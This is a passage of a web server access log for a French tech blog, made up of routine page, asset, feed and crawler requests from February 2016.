(Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9\"\n193.5.240.1 - - [08/Feb/2016:05:25:34 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/michael-ferranti-responsable-marketing-a-mailgun/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9\"\n193.5.240.1 - - [08/Feb/2016:05:25:35 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/michael-ferranti-responsable-marketing-a-mailgun/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9\"\n40.77.167.6 - - [08/Feb/2016:05:25:44 -0800] \"GET /xavier-mouton-dubosc-le-developpeur-aux-mille/ HTTP/1.1\" 200 10008 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n40.77.167.6 - - [08/Feb/2016:05:25:46 -0800] \"GET /blake-haggerty-evangeliste-startups-developpeurs/ HTTP/1.1\" 200 9957 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.147 - - [08/Feb/2016:05:25:50 -0800] \"GET /frenchweb-de-lautre-cote-de-la-camera/ HTTP/1.1\" 200 8122 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.147 - - [08/Feb/2016:05:25:53 -0800] \"GET /rostom-cheikh-aissa-de-gdf-suez-complexity-is/ HTTP/1.1\" 200 9306 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.30 - - [08/Feb/2016:05:25:57 -0800] \"GET /category/portraits/ HTTP/1.1\" 200 7340 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.30 - - [08/Feb/2016:05:26:00 -0800] \"GET /pierre-lacombe-de-parrot-a-la-poursuite-du/ HTTP/1.1\" 200 9752 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [08/Feb/2016:05:26:06 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15506 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [08/Feb/2016:05:26:09 -0800] \"GET /marketing-pour-developpeurs-partie-2/ HTTP/1.1\" 200 9429 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [08/Feb/2016:05:26:11 -0800] \"GET /category/portraits/page/4/ HTTP/1.1\" 200 7296 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n5.39.17.245 - - [08/Feb/2016:05:27:45 -0800] \"GET /rss HTTP/1.1\" 301 418 \"http://techmeup.co/rss\" \"SimplePie/1.3.1 (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20140612090914\"\n193.164.197.233 - - [08/Feb/2016:05:32:24 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n193.164.197.233 - - [08/Feb/2016:05:32:35 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n37.9.118.28 - - [08/Feb/2016:05:36:10 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots mtmon01i.yandex.ru)\"\n83.193.62.96 - - [08/Feb/2016:05:36:56 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n83.193.62.96 - - [08/Feb/2016:05:37:08 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n83.193.62.96 - - [08/Feb/2016:05:38:22 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n83.193.62.96 - - [08/Feb/2016:05:38:34 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n51.255.65.60 - - [08/Feb/2016:05:39:30 -0800] \"GET / HTTP/1.1\" 200 7218 \"-\" \"Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)\"\n83.193.62.96 - - [08/Feb/2016:05:40:06 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n83.193.62.96 - - [08/Feb/2016:05:40:18 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n83.193.62.96 - - [08/Feb/2016:05:40:43 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n83.193.62.96 - - [08/Feb/2016:05:40:55 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n54.161.123.107 - - [08/Feb/2016:05:48:41 -0800] \"GET /category/europe/feed/ HTTP/1.1\" 200 27874 \"-\" \"Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)\"\n80.11.221.97 - - [08/Feb/2016:05:54:28 -0800] \"GET /wp-content/uploads/2015/02/Hedge-Funds-and-Social-Media.jpg HTTP/1.1\" 200 768387 \"http://www.bing.com/images/search?q=suivez+nous+sur+facebook&view=detailv2&&id=CBBE7E8391E68472CA1923D98F6EFCE7709F8EF6&selectedIndex=0&ccid=k3%2bT1B3b&simid=607990219777050871&thid=OIP.M937f93d41ddbfa9fb7c4b9eafcbe1ce8o0\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n85.69.109.184 - - [08/Feb/2016:05:57:01 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Linux; Android 6.0.1; A0001 Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 ACHEETAHI/2100502020\"\n85.69.109.184 - - [08/Feb/2016:05:57:01 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Linux; Android 6.0.1; A0001 Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 ACHEETAHI/2100502020\"\n85.69.109.184 - - [08/Feb/2016:05:57:01 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Linux; Android 6.0.1; A0001 Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 ACHEETAHI/2100502020\"\n85.69.109.184 - - [08/Feb/2016:05:57:01 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Linux; Android 6.0.1; A0001 Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 ACHEETAHI/2100502020\"\n85.69.109.184 - - [08/Feb/2016:05:57:01 -0800] \"GET /wp-content/uploads/2014/08/tumblr_inline_nb1bncXtIP1r792z4-50x50.jpg HTTP/1.1\" 200 2531 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Linux; Android 6.0.1; A0001 Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 ACHEETAHI/2100502020\"\n85.69.109.184 - - [08/Feb/2016:05:57:02 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 6.0.1; A0001 Build/MMB29T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.119 Mobile Safari/537.36 ACHEETAHI/2100502020\"\n85.69.109.184 - - [08/Feb/2016:05:57:08 -0800] \"GET /creer-sa-startup-seul-et-la-revendre-a-un-geant/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Dalvik/2.1.0 (Linux; U; Android 6.0.1; A0001 Build/MMB29T)\"\n199.16.156.124 - - [08/Feb/2016:05:58:07 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n80.13.10.184 - - [08/Feb/2016:06:03:20 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15507 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n80.13.10.184 - - [08/Feb/2016:06:03:33 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15543 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n80.13.10.184 - - [08/Feb/2016:06:03:39 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n2.1.72.179 - - [08/Feb/2016:06:06:16 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n202.39.169.163 - - [08/Feb/2016:06:11:35 -0800] \"GET /je-viens-chercher-mon-stage-dans-la-silicon-valley/ HTTP/1.1\" 200 11364 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n202.39.169.163 - - [08/Feb/2016:06:12:00 -0800] \"GET /post/104173274688/je-viens-chercher-mon-stage-dans-la-silicon-valley HTTP/1.1\" 301 370 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n202.39.169.163 - - [08/Feb/2016:06:12:10 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n185.46.214.61 - - [08/Feb/2016:06:16:39 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 803660 \"http://www.silicon-valley.fr/crowdfunding-kickstarter-startup/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n212.195.42.141 - - [08/Feb/2016:06:18:48 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n212.195.42.141 - - [08/Feb/2016:06:18:50 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203835 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n194.7.114.2 - - [08/Feb/2016:06:22:13 -0800] \"GET /rostom-cheikh-aissa-de-gdf-suez-complexity-is/ HTTP/1.1\" 200 9351 \"http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwijt5W3rejKAhXLuhoKHVPPDxMQFggtMAU&url=http%3A%2F%2Ftechmeup.co%2Frostom-cheikh-aissa-de-gdf-suez-complexity-is%2F&usg=AFQjCNEhzyKRXoeuskF6upCjq9-M-mi-kA&bvm=bv.113370389,d.d2s\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n194.7.114.2 - - [08/Feb/2016:06:22:13 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7663 \"http://techmeup.co/rostom-cheikh-aissa-de-gdf-suez-complexity-is/\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n194.7.114.2 - - [08/Feb/2016:06:22:13 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/rostom-cheikh-aissa-de-gdf-suez-complexity-is/\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n194.7.114.2 - - [08/Feb/2016:06:22:14 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/rostom-cheikh-aissa-de-gdf-suez-complexity-is/\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n194.7.114.2 - - [08/Feb/2016:06:22:14 -0800] \"GET /wp-content/uploads/2015/03/UX-Basics-Workshop-50x50.jpg HTTP/1.1\" 200 2253 \"http://techmeup.co/rostom-cheikh-aissa-de-gdf-suez-complexity-is/\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n194.7.114.2 - - [08/Feb/2016:06:22:14 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/rostom-cheikh-aissa-de-gdf-suez-complexity-is/\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n194.7.114.2 - - [08/Feb/2016:06:22:15 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"-\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n176.31.67.99 - - [08/Feb/2016:06:22:56 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15528 \"https://www.google.fr/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.31.67.99 - - [08/Feb/2016:06:22:57 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.31.67.99 - - [08/Feb/2016:06:22:57 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3600 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.31.67.99 - - [08/Feb/2016:06:22:57 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.31.67.99 - - [08/Feb/2016:06:22:58 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.31.67.99 - - [08/Feb/2016:06:23:00 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.31.67.99 - - [08/Feb/2016:06:23:01 -0800] \"GET /wp-content/uploads/2014/05/tumblr_inline_n54poil5sD1r792z4-50x50.jpg HTTP/1.1\" 200 2099 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n194.7.114.2 - - [08/Feb/2016:06:24:34 -0800] \"GET /rostom-cheikh-aissa-de-gdf-suez-complexity-is/ HTTP/1.1\" 200 9385 \"http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwijt5W3rejKAhXLuhoKHVPPDxMQFggtMAU&url=http%3A%2F%2Ftechmeup.co%2Frostom-cheikh-aissa-de-gdf-suez-complexity-is%2F&usg=AFQjCNEhzyKRXoeuskF6upCjq9-M-mi-kA&bvm=bv.113370389,d.d2s\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n194.7.114.2 - - [08/Feb/2016:06:24:42 -0800] \"GET /wp-content/uploads/2014/08/tumblr_inline_naj6huWLqb1sa6hof-50x50.jpg HTTP/1.1\" 200 2458 \"http://techmeup.co/rostom-cheikh-aissa-de-gdf-suez-complexity-is/\" \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n198.58.102.155 - - [08/Feb/2016:06:27:41 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n207.241.237.221 - - [08/Feb/2016:06:32:34 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.0\" 200 5107 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)\"\n86.199.111.82 - - [08/Feb/2016:06:36:48 -0800] \"GET /post/107320013813/marketing-pour-developpeurs-partie-1 HTTP/1.1\" 301 356 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n46.218.58.106 - - [08/Feb/2016:06:38:58 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/author/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0\"\n46.218.58.106 - - [08/Feb/2016:06:38:58 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/author/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0\"\n52.90.30.177 - - [08/Feb/2016:06:41:12 -0800] \"GET /2014/04/ HTTP/1.1\" 200 6114 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML,like Gecko) Chrome/40.0.2214.115 Safari/537.36\"\n52.90.30.177 - - [08/Feb/2016:06:41:12 -0800] \"GET /2014/12/ HTTP/1.1\" 200 5966 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML,like Gecko) Chrome/40.0.2214.115 Safari/537.36\"\n52.90.30.177 - - [08/Feb/2016:06:41:12 -0800] \"GET /2015/02/ HTTP/1.1\" 200 7127 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML,like Gecko) Chrome/40.0.2214.115 Safari/537.36\"\n52.90.30.177 - - [08/Feb/2016:06:41:13 -0800] \"GET /category/portraits/ HTTP/1.1\" 200 7285 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML,like Gecko) Chrome/40.0.2214.115 Safari/537.36\"\n52.90.30.177 - - [08/Feb/2016:06:41:14 -0800] \"GET /ce-que-je-referais-autrement-invite-cedric-giorgi/ HTTP/1.1\" 200 9902 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML,like Gecko) Chrome/40.0.2214.115 Safari/537.36\"\n52.90.30.177 - - [08/Feb/2016:06:41:15 -0800] \"GET /category/usa/ HTTP/1.1\" 200 7424 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML,like Gecko) Chrome/40.0.2214.115 Safari/537.36\"\n52.90.30.177 - - [08/Feb/2016:06:41:15 -0800] \"GET /category/europe/ HTTP/1.1\" 200 7313 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML,like Gecko) Chrome/40.0.2214.115 Safari/537.36\"\n52.91.89.233 - - [08/Feb/2016:06:42:00 -0800] \"GET /le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/ HTTP/1.1\" 200 9041 \"-\" \"-\"\n52.91.89.233 - - [08/Feb/2016:06:42:00 -0800] \"GET /ce-que-je-referais-autrement-invite-cedric-giorgi/ HTTP/1.1\" 200 9958 \"-\" \"-\"\n50.116.28.209 - - [08/Feb/2016:06:47:22 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n185.32.100.228 - - [08/Feb/2016:06:55:19 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:06:55:19 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:06:55:19 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:06:55:20 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:06:55:20 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:06:55:20 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n66.249.64.132 - - [08/Feb/2016:07:00:00 -0800] \"GET /2015/02/ HTTP/1.1\" 200 7183 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n212.51.165.254 - - [08/Feb/2016:07:01:42 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4816 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n212.51.165.254 - - [08/Feb/2016:07:01:56 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4816 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n198.58.103.160 - - [08/Feb/2016:07:03:17 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n185.32.100.228 - - [08/Feb/2016:07:03:22 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 304 211 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:07:03:22 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 304 212 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:07:03:22 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 304 210 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n185.32.100.228 - - [08/Feb/2016:07:03:22 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 503 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\"\n90.63.244.202 - - [08/Feb/2016:07:08:02 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15531 \"https://www.google.fr/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.63.244.202 - - [08/Feb/2016:07:08:03 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.63.244.202 - - [08/Feb/2016:07:08:04 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.63.244.202 - - [08/Feb/2016:07:08:04 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.63.244.202 - - [08/Feb/2016:07:08:04 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 